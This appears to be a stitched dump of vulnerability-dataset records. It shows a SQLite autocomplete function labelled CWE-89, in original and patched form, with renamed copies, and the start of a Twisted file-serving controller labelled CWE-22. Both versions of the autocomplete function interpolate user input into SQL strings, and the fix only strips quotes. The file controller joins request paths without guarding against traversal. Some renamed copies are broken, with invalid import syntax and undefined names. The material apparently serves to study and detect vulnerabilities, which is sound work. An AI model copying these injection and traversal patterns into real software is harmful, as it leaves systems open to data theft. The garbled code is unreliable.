re.compile(r'(?P<VAR_88>https?://(?P<VAR_101>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_88>[a-z0-9._-]+@(?P<VAR_101>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_12 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_13 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_14 = ['nolink']
def FUNC_1(VAR_15, VAR_16=VAR_11,
VAR_17=VAR_12,
VAR_18=VAR_13,
VAR_19=VAR_14):
if VAR_15.tag in VAR_17:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_62 = VAR_62.split()
for match_class in VAR_19:
if match_class in VAR_62:
return
for child in list(VAR_15):
FUNC_1(child, VAR_16=link_regexes,
VAR_17=avoid_elements,
VAR_18=avoid_hosts,
VAR_19=avoid_classes)
if child.tail:
VAR_20, VAR_92 = FUNC_2(
child.tail, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_92:
child.tail = VAR_20
VAR_99 = VAR_15.index(child)
VAR_15[VAR_99+1:VAR_99+1] = VAR_92
if VAR_15.text:
VAR_20, VAR_83 = FUNC_2(
VAR_15.text, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_83:
VAR_15.text = VAR_20
VAR_15[:0] = VAR_83
def FUNC_2(VAR_20, VAR_16, VAR_18, VAR_21):
VAR_63 = ''
VAR_37 = []
VAR_64 = 0
while 1:
VAR_84, VAR_85 = None, None
for regex in VAR_16:
VAR_93 = VAR_64
while 1:
VAR_100 = regex.search(VAR_20, pos=VAR_93)
if VAR_100 is None:
break
VAR_101 = VAR_100.group('host')
for host_regex in VAR_18:
if host_regex.search(VAR_101):
VAR_93 = VAR_100.end()
break
else:
break
if VAR_100 is None:
continue
if VAR_85 is None or VAR_100.start() < VAR_85:
VAR_84 = VAR_100
VAR_85 = VAR_100.start()
if VAR_84 is None:
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_20
else:
assert not VAR_63
leading_text = VAR_20
break
VAR_60 = VAR_84.group(0)
VAR_86 = VAR_84.end()
if VAR_60.endswith('.') or VAR_60.endswith(','):
VAR_86 -= 1
VAR_60 = link[:-1]
VAR_87 = VAR_20[:VAR_84.start()]
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_87
else:
assert not VAR_63
leading_text = VAR_87
VAR_56 = VAR_21('a')
VAR_56.set('href', VAR_60)
VAR_88 = VAR_84.group('body')
if not VAR_88:
VAR_88 = VAR_60
if VAR_88.endswith('.') or VAR_88.endswith(','):
VAR_88 = body[:-1]
VAR_56.text = VAR_88
VAR_37.append(VAR_56)
VAR_20 = text[VAR_86:]
return VAR_63, VAR_37
def FUNC_3(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
FUNC_1(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_25 = ['pre', 'textarea', 'code']
VAR_26 = ['nobreak']
def FUNC_4(VAR_15, VAR_27=40,
VAR_17=VAR_25,
VAR_19=VAR_26,
VAR_28=VAR_69(0x200b)):
if VAR_15.tag in VAR_25:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_89 = False
VAR_62 = VAR_62.split()
for avoid in VAR_19:
if avoid in VAR_62:
VAR_89 = True
break
if VAR_89:
return
if VAR_15.text:
VAR_15.text = FUNC_6(VAR_15.text, VAR_27, VAR_28)
for child in VAR_15:
FUNC_4(child, VAR_27=max_width,
VAR_17=avoid_elements,
VAR_19=avoid_classes,
VAR_28=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_27, VAR_28)
def FUNC_5(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
VAR_55 = fromstring(VAR_22)
FUNC_4(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
def FUNC_6(VAR_20, VAR_27, VAR_28):
VAR_66 = VAR_20.split()
for VAR_30 in VAR_66:
if len(VAR_30) > VAR_27:
VAR_94 = FUNC_7(VAR_30, VAR_27, VAR_28)
VAR_20 = VAR_20.replace(VAR_30, VAR_94)
return VAR_20
VAR_29 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_30, VAR_31, VAR_28):
VAR_67 = VAR_30
VAR_68 = ''
while len(VAR_30) > VAR_31:
VAR_90 = VAR_30[:VAR_31]
VAR_91 = list(VAR_29.finditer(VAR_90))
if VAR_91:
VAR_95 = VAR_91[-1]
if VAR_95.end() > VAR_31-10:
VAR_90 = VAR_30[:VAR_95.end()]
VAR_68 += VAR_90 + VAR_28
VAR_30 = word[len(VAR_90):]
VAR_68 += VAR_30
return VAR_68
| [
2,
6,
12,
18,
22,
27,
32,
38,
39,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
66,
67,
70,
71,
72,
82,
84,
85,
86,
89,
92,
97,
98,
104,
107,
111,
114,
117,
120,
123,
126,
129,
132,
135,
138,
141,
144,
148,
152,
155,
158,
162,
166,
169,
178,
181,
183,
190,
193,
216,
225,
226,
227,
231,
232,
237,
238,
239,
240,
241,
242,
243,
244,
247,
253,
255,
257,
258,
262,
263,
265,
269,
282,
290,
291,
298,
309,
312,
317,
318,
319,
330,
331,
334,
342,
343,
344,
353,
356,
357,
358,
365,
377,
379,
380,
385,
386,
391,
397,
427,
433,
451,
463,
474,
482,
484,
487,
490,
492,
498,
513,
522,
525,
526,
527,
528,
529,
532,
535,
537,
543,
545,
552,
555,
560,
590,
616,
627,
648,
657,
659,
660,
661,
662,
663,
666,
673,
676,
681,
684,
685,
707,
713,
721,
723,
732,
734,
735,
741,
742,
1,
2,
3,
4,
5,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
550,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
671,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
682,
683,
249,
250,
251,
429,
430,
431,
465,
466,
467,
468,
469,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503
] | [
2,
6,
13,
19,
23,
28,
33,
39,
40,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
64,
67,
68,
71,
72,
73,
83,
85,
86,
87,
90,
93,
98,
99,
105,
108,
112,
115,
118,
121,
124,
127,
130,
133,
136,
139,
142,
145,
149,
153,
156,
159,
163,
167,
170,
179,
182,
184,
191,
194,
217,
226,
227,
228,
232,
233,
238,
239,
240,
241,
242,
243,
244,
245,
248,
254,
256,
258,
259,
263,
264,
266,
270,
283,
291,
292,
299,
310,
313,
318,
319,
320,
331,
332,
335,
343,
344,
345,
354,
357,
358,
359,
366,
378,
380,
381,
386,
387,
392,
398,
428,
434,
452,
464,
475,
483,
485,
488,
491,
493,
499,
514,
523,
526,
527,
528,
529,
530,
533,
536,
538,
544,
546,
553,
556,
561,
591,
617,
628,
649,
658,
660,
661,
662,
663,
664,
667,
674,
677,
682,
685,
686,
708,
714,
722,
724,
733,
735,
736,
742,
743,
1,
2,
3,
4,
5,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
564,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
682,
683,
684,
250,
251,
252,
430,
431,
432,
466,
467,
468,
469,
470,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504
] |
2CWE-89
| import sqlite3
import re
import timeit
import sys
import os
pathlist = os.path.realpath(__file__).split(os.path.sep)
RTXindex = pathlist.index("RTX")
sys.path.append(os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code']))
from RTXConfiguration import RTXConfiguration
RTXConfig = RTXConfiguration()
autocomplete_filepath = os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code', 'autocomplete'])
conn = None
cursor = None
def load():
global conn
global cursor
database_name = f"{autocomplete_filepath}{os.path.sep}{RTXConfig.autocomplete_path.split('/')[-1]}"
conn = sqlite3.connect(database_name)
cursor = conn.cursor()
return True
def get_nodes_like(word,requested_limit):
debug = False
t0 = timeit.default_timer()
requested_limit = int(requested_limit)
values = []
n_values = 0
if len(word) < 2:
return values
floor = word[:-1]
ceiling = floor + 'zz'
#### Get a list of matching node names that begin with these letters
if debug:
print(f"INFO: Query 1")
#cursor.execute("SELECT term FROM term WHERE term LIKE \"%s%%\" ORDER BY length(term),term LIMIT %s" % (word,1000))
cursor.execute(f"SELECT term FROM terms WHERE term > \"{floor}\" AND term < \"{ceiling}\" AND term LIKE \"{word}%%\" ORDER BY length(term),term LIMIT {requested_limit}")
rows = cursor.fetchall()
values_dict = {}
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
values_dict[term.upper()] = 1
n_values += 1
if n_values >= requested_limit:
break
t1 = timeit.default_timer()
if debug:
print(f"INFO: Query 1 in {t1-t0} sec")
#### If we haven't reached the limit yet, add a list of matching terms that contain this string
if n_values < requested_limit:
if debug:
print(f"INFO: Query 2")
#### See if there is a cached entry already
word_part = word
found_fragment = None
while len(word_part) > 2:
cursor.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{word_part}\"")
rows = cursor.fetchall()
if len(rows) > 0:
fragment_id = rows[0][0]
found_fragment = rows[0][1]
break
word_part = word_part[:-1]
if found_fragment:
if debug:
print(f"Found matching fragment {found_fragment} as fragment_id {fragment_id}")
cursor.execute(f"SELECT term FROM cached_fragment_terms WHERE fragment_id = {fragment_id} AND term LIKE \"%%{word}%%\"")
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
if found_fragment is None:
#### Cache this fragment in the database
cursor.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (word,))
fragment_id = cursor.lastrowid
if debug:
print(f"fragment_id = {fragment_id}")
#### Execute an expensive LIKE query
cursor.execute("SELECT term FROM terms WHERE term LIKE \"%%%s%%\" ORDER BY length(term),term LIMIT %s" % (word,10000))
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
values_dict[term.upper()] = 1
cursor.execute("INSERT INTO cached_fragment_terms(fragment_id, term) VALUES(?,?)", (fragment_id, term,))
conn.commit()
t2 = timeit.default_timer()
if debug:
print(f"INFO: Query 2 in {t2-t1} sec")
return(values)
| import sqlite3
import re
import timeit
import sys
import os
pathlist = os.path.realpath(__file__).split(os.path.sep)
RTXindex = pathlist.index("RTX")
sys.path.append(os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code']))
from RTXConfiguration import RTXConfiguration
RTXConfig = RTXConfiguration()
autocomplete_filepath = os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code', 'autocomplete'])
conn = None
cursor = None
def load():
global conn
global cursor
database_name = f"{autocomplete_filepath}{os.path.sep}{RTXConfig.autocomplete_path.split('/')[-1]}"
conn = sqlite3.connect(database_name)
cursor = conn.cursor()
#print(f"INFO: Connected to {database_name}",file=sys.stderr)
return True
def get_nodes_like(word,requested_limit):
debug = False
t0 = timeit.default_timer()
requested_limit = int(requested_limit)
values = []
n_values = 0
if len(word) < 2:
return values
#### Try to avoid SQL injection exploits by sanitizing input #1823
word = word.replace('"','')
floor = word[:-1]
ceiling = floor + 'zz'
#### Get a list of matching node names that begin with these letters
if debug:
print(f"INFO: Query 1")
#cursor.execute("SELECT term FROM term WHERE term LIKE \"%s%%\" ORDER BY length(term),term LIMIT %s" % (word,1000))
cursor.execute(f"SELECT term FROM terms WHERE term > \"{floor}\" AND term < \"{ceiling}\" AND term LIKE \"{word}%%\" ORDER BY length(term),term LIMIT {requested_limit}")
rows = cursor.fetchall()
values_dict = {}
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
values_dict[term.upper()] = 1
n_values += 1
if n_values >= requested_limit:
break
t1 = timeit.default_timer()
if debug:
print(f"INFO: Query 1 in {t1-t0} sec")
#### If we haven't reached the limit yet, add a list of matching terms that contain this string
if n_values < requested_limit:
if debug:
print(f"INFO: Query 2")
#### See if there is a cached entry already
word_part = word
found_fragment = None
while len(word_part) > 2:
cursor.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{word_part}\"")
rows = cursor.fetchall()
if len(rows) > 0:
fragment_id = rows[0][0]
found_fragment = rows[0][1]
break
word_part = word_part[:-1]
if found_fragment:
if debug:
print(f"Found matching fragment {found_fragment} as fragment_id {fragment_id}")
cursor.execute(f"SELECT term FROM cached_fragment_terms WHERE fragment_id = {fragment_id} AND term LIKE \"%%{word}%%\"")
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
if found_fragment is None:
#### Cache this fragment in the database
try:
cursor.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (word,))
fragment_id = cursor.lastrowid
except:
print(f"ERROR: Unable to INSERT into cached_fragments(fragment)",file=sys.stderr)
fragment_id = 0
if debug:
print(f"fragment_id = {fragment_id}")
#### Execute an expensive LIKE query
cursor.execute("SELECT term FROM terms WHERE term LIKE \"%%%s%%\" ORDER BY length(term),term LIMIT %s" % (word,10000))
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
values_dict[term.upper()] = 1
cursor.execute("INSERT INTO cached_fragment_terms(fragment_id, term) VALUES(?,?)", (fragment_id, term,))
conn.commit()
t2 = timeit.default_timer()
if debug:
print(f"INFO: Query 2 in {t2-t1} sec")
return(values)
| sql | {
"code": [
" cursor.execute(\"INSERT INTO cached_fragments(fragment) VALUES(?)\", (word,))",
" fragment_id = cursor.lastrowid"
],
"line_no": [
106,
107
]
} | {
"code": [
" try:",
" fragment_id = cursor.lastrowid",
" except:",
" fragment_id = 0"
],
"line_no": [
110,
112,
113,
115
]
} | import sqlite3
import re
import timeit
import sys
import os
VAR_0 = os.path.realpath(__file__).split(os.path.sep)
VAR_1 = VAR_0.index("RTX")
sys.path.append(os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code']))
from RTXConfiguration import .RTXConfiguration
VAR_2 = RTXConfiguration()
VAR_3 = os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code', 'autocomplete'])
VAR_4 = None
VAR_5 = None
def FUNC_0():
global VAR_4
global VAR_5
VAR_8 = f"{VAR_3}{os.path.sep}{VAR_2.autocomplete_path.split('/')[-1]}"
VAR_4 = sqlite3.connect(VAR_8)
VAR_5 = VAR_4.cursor()
return True
def FUNC_1(VAR_6,VAR_7):
VAR_9 = False
VAR_10 = timeit.default_timer()
VAR_7 = int(VAR_7)
VAR_11 = []
VAR_12 = 0
if len(VAR_6) < 2:
return VAR_11
VAR_13 = VAR_6[:-1]
VAR_14 = VAR_13 + 'zz'
if VAR_9:
print(f"INFO: Query 1")
VAR_5.execute(f"SELECT VAR_18 FROM terms WHERE VAR_18 > \"{VAR_13}\" AND VAR_18 < \"{VAR_14}\" AND VAR_18 LIKE \"{VAR_6}%%\" ORDER BY length(VAR_18),term LIMIT {VAR_7}")
VAR_15 = VAR_5.fetchall()
VAR_16 = {}
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_16[VAR_18.upper()] = 1
VAR_12 += 1
if VAR_12 >= VAR_7:
break
VAR_17 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 1 in {VAR_17-VAR_10} sec")
if VAR_12 < VAR_7:
if VAR_9:
print(f"INFO: Query 2")
VAR_19 = VAR_6
VAR_20 = None
while len(VAR_19) > 2:
VAR_5.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{VAR_19}\"")
VAR_15 = VAR_5.fetchall()
if len(VAR_15) > 0:
VAR_23 = VAR_15[0][0]
VAR_20 = VAR_15[0][1]
break
VAR_19 = word_part[:-1]
if VAR_20:
if VAR_9:
print(f"Found matching fragment {VAR_20} as VAR_23 {fragment_id}")
VAR_5.execute(f"SELECT VAR_18 FROM cached_fragment_terms WHERE VAR_23 = {VAR_23} AND VAR_18 LIKE \"%%{VAR_6}%%\"")
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
if VAR_20 is None:
VAR_5.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (VAR_6,))
VAR_23 = VAR_5.lastrowid
if VAR_9:
print(f"fragment_id = {VAR_23}")
VAR_5.execute("SELECT VAR_18 FROM terms WHERE VAR_18 LIKE \"%%%s%%\" ORDER BY length(VAR_18),term LIMIT %s" % (VAR_6,10000))
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
VAR_16[VAR_18.upper()] = 1
VAR_5.execute("INSERT INTO cached_fragment_terms(VAR_23, VAR_18) VALUES(?,?)", (VAR_23, VAR_18,))
VAR_4.commit()
VAR_21 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 2 in {VAR_21-VAR_17} sec")
return(VAR_11)
| import sqlite3
import re
import timeit
import sys
import os
VAR_0 = os.path.realpath(__file__).split(os.path.sep)
VAR_1 = VAR_0.index("RTX")
sys.path.append(os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code']))
from RTXConfiguration import .RTXConfiguration
VAR_2 = RTXConfiguration()
VAR_3 = os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code', 'autocomplete'])
VAR_4 = None
VAR_5 = None
def FUNC_0():
global VAR_4
global VAR_5
VAR_8 = f"{VAR_3}{os.path.sep}{VAR_2.autocomplete_path.split('/')[-1]}"
VAR_4 = sqlite3.connect(VAR_8)
VAR_5 = VAR_4.cursor()
return True
def FUNC_1(VAR_6,VAR_7):
VAR_9 = False
VAR_10 = timeit.default_timer()
VAR_7 = int(VAR_7)
VAR_11 = []
VAR_12 = 0
if len(VAR_6) < 2:
return VAR_11
VAR_6 = word.replace('"','')
VAR_13 = VAR_6[:-1]
VAR_14 = VAR_13 + 'zz'
if VAR_9:
print(f"INFO: Query 1")
VAR_5.execute(f"SELECT VAR_18 FROM terms WHERE VAR_18 > \"{VAR_13}\" AND VAR_18 < \"{VAR_14}\" AND VAR_18 LIKE \"{VAR_6}%%\" ORDER BY length(VAR_18),term LIMIT {VAR_7}")
VAR_15 = VAR_5.fetchall()
VAR_16 = {}
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_16[VAR_18.upper()] = 1
VAR_12 += 1
if VAR_12 >= VAR_7:
break
VAR_17 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 1 in {VAR_17-VAR_10} sec")
if VAR_12 < VAR_7:
if VAR_9:
print(f"INFO: Query 2")
VAR_19 = VAR_6
VAR_20 = None
while len(VAR_19) > 2:
VAR_5.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{VAR_19}\"")
VAR_15 = VAR_5.fetchall()
if len(VAR_15) > 0:
VAR_23 = VAR_15[0][0]
VAR_20 = VAR_15[0][1]
break
VAR_19 = word_part[:-1]
if VAR_20:
if VAR_9:
print(f"Found matching fragment {VAR_20} as VAR_23 {fragment_id}")
VAR_5.execute(f"SELECT VAR_18 FROM cached_fragment_terms WHERE VAR_23 = {VAR_23} AND VAR_18 LIKE \"%%{VAR_6}%%\"")
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
if VAR_20 is None:
try:
VAR_5.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (VAR_6,))
VAR_23 = VAR_5.lastrowid
except:
print(f"ERROR: Unable to INSERT into cached_fragments(fragment)",file=sys.stderr)
VAR_23 = 0
if VAR_9:
print(f"fragment_id = {VAR_23}")
VAR_5.execute("SELECT VAR_18 FROM terms WHERE VAR_18 LIKE \"%%%s%%\" ORDER BY length(VAR_18),term LIMIT %s" % (VAR_6,10000))
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
VAR_16[VAR_18.upper()] = 1
VAR_5.execute("INSERT INTO cached_fragment_terms(VAR_23, VAR_18) VALUES(?,?)", (VAR_23, VAR_18,))
VAR_4.commit()
VAR_21 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 2 in {VAR_21-VAR_17} sec")
return(VAR_11)
| [
6,
11,
14,
15,
18,
19,
27,
28,
30,
32,
35,
38,
41,
44,
45,
48,
66,
67,
71,
72,
83,
87,
90,
94,
101,
102,
104,
105,
110,
111,
114,
118,
125,
129,
133,
134,
136,
137
] | [
6,
11,
14,
15,
18,
19,
26,
28,
29,
31,
33,
36,
39,
42,
43,
45,
48,
49,
52,
70,
71,
75,
76,
87,
91,
94,
98,
105,
106,
108,
109,
118,
119,
122,
126,
133,
137,
141,
142,
144,
145
] |
0CWE-22
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
RESTful Filesystem access using HTTP
------------------------------------
This controller and helper classes exposes parts or all of the server's
filesystem. Means to retrieve and delete files are provided as well as the
ability to list folder contents.
The generated responses are returned as JSON data with appropriate HTTP headers.
Output will be compressed using gzip most of the times.
Example calls using curl
++++++++++++++++++++++++
The following examples assume that the FileController instance is accessible
as '/file' on 'localhost', port 18888 (http://localhost:18888/file).
Fetch list of files and folders in root folder:
curl --noproxy localhost -iv http://localhost:18888/file
Fetch example file 'example.txt'
curl --noproxy localhost -iv http://localhost:18888/file/example.txt
Fetch gzipped example file 'example.txt'
curl --compressed -H "Accept-Encoding: gzip" --noproxy localhost -iv http://localhost:18888/file/example.txt
Delete example file 'example.txt'
curl --noproxy localhost -iv -X DELETE http://localhost:18888/file/example.txt
"""
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
import file
MANY_SLASHES_PATTERN = r'[\/]+'
MANY_SLASHES_REGEX = re.compile(MANY_SLASHES_PATTERN)
#: default path from which files will be served
DEFAULT_ROOT_PATH = os.path.abspath(os.path.dirname(__file__))
#: CORS - HTTP headers the client may use
CORS_ALLOWED_CLIENT_HEADERS = [
'Content-Type',
]
#: CORS - HTTP methods the client may use
CORS_ALLOWED_METHODS_DEFAULT = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
#: CORS - default origin header value
CORS_DEFAULT_ALLOW_ORIGIN = '*'
#: CORS - HTTP headers the server will send as part of OPTIONS response
CORS_DEFAULT = {
'Access-Control-Allow-Origin': CORS_DEFAULT_ALLOW_ORIGIN,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(CORS_ALLOWED_METHODS_DEFAULT),
'Access-Control-Allow-Headers': ', '.join(CORS_ALLOWED_CLIENT_HEADERS)
}
#: paths where file delete operations shall be allowed
DELETE_WHITELIST = [
'/media',
]
class FileController(twisted.web.resource.Resource):
isLeaf = True
_override_args = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
_resource_prefix = '/file'
_root = os.path.abspath(os.path.dirname(__file__))
_do_delete = False
_delete_whitelist = DELETE_WHITELIST
never_gzip_extensions = ('.ts',)
def __init__(self, *args, **kwargs):
"""
Default Constructor.
Args:
resource_prefix: Prefix value for this controller instance.
Default is :py:data:`FileController._resource_prefix`
root: Root path of files to be served.
Default is the path where the current file is located
do_delete: Try to actually delete files?
Default is False.
delete_whitelist: Folder prefixes where delete operations are
allowed _at all_. Default is :py:data:`DELETE_WHITELIST`
"""
if args:
for key, value in zip(self._override_args, args):
kwargs[key] = value
for arg_name in self._override_args:
if kwargs.get(arg_name) is not None:
attr_name = '_{:s}'.format(arg_name)
setattr(self, attr_name, kwargs.get(arg_name))
self.session = kwargs.get("session")
def _json_response(self, request, data):
"""
Create a JSON representation for *data* and set HTTP headers indicating
that JSON encoded data is returned.
Args:
request (twisted.web.server.Request): HTTP request object
data: response content
Returns:
JSON representation of *data* with appropriate HTTP headers
"""
request.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(data, indent=2)
def get_response_data_template(self, request):
"""
Generate a response data :class:`dict` containing default values and
some request attribute values for debugging purposes.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
(dict) response template data
"""
file_path = None
if request.path.startswith(self._resource_prefix):
file_path = request.path[len(self._resource_prefix):]
response_data = {
"_request": {
"path": request.path,
"uri": request.uri,
"method": request.method,
"postpath": request.postpath,
"file_path": file_path,
},
"result": False,
}
return response_data
def error_response(self, request, response_code=None, **kwargs):
"""
Create and return an HTTP error response with data as JSON.
Args:
request (twisted.web.server.Request): HTTP request object
response_code: HTTP Status Code (default is 500)
**kwargs: additional key/value pairs
Returns:
JSON encoded data with appropriate HTTP headers
"""
if response_code is None:
response_code = http.INTERNAL_SERVER_ERROR
response_data = self.get_response_data_template(request)
response_data.update(**kwargs)
response_data['me'] = dict()
for arg_name in self._override_args:
attr_name = '_{:s}'.format(arg_name)
response_data['me'][attr_name] = getattr(self, attr_name)
request.setResponseCode(response_code)
return self._json_response(request, response_data)
def _existing_path_or_bust(self, request):
"""
Verify that a filesystem location which is contained in *request.path*
is valid and an existing path.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
path
Raises:
ValueError: If contained path value is invalid.
IOError: If contained path value is not existing.
"""
rq_path = urlparse.unquote(request.path)
if not rq_path.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(request.path))
file_path = os.path.join(
self._root, rq_path[len(self._resource_prefix) + 1:])
file_path = re.sub(MANY_SLASHES_REGEX, '/', file_path)
if not os.path.exists(file_path):
raise IOError("Not Found {!r}".format(file_path))
return file_path
def render_OPTIONS(self, request):
"""
Render response for an HTTP OPTIONS request.
Example request
curl -iv --noproxy localhost http://localhost:18888/file
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
for key in CORS_DEFAULT:
request.setHeader(key, CORS_DEFAULT[key])
return ''
def render_legacy(self, request):
"""
Render response for an HTTP GET request. In order to maintain
backward compatibility this method emulates the behaviour of the
legacy method implementation.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
return file.FileController().render(request)
def _glob(self, path, pattern='*'):
if path == '/':
glob_me = '/' + pattern
else:
glob_me = '/'.join((path, pattern))
return glob.iglob(glob_me)
def _walk(self, path):
for root, dirs, files in os.walk(path):
for dir_item in dirs:
yield os.path.join(root, dir_item)
for file_item in files:
yield os.path.join(root, file_item)
def render_path_listing(self, request, path):
"""
Generate a file/folder listing of *path*'s contents.
Args:
request (twisted.web.server.Request): HTTP request object
path: folder location
Returns:
HTTP response with headers
"""
response_data = self.get_response_data_template(request)
response_data.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
generator = None
if "pattern" in request.args:
generator = self._glob(path, request.args["pattern"][0])
if "recursive" in request.args:
generator = self._walk(path)
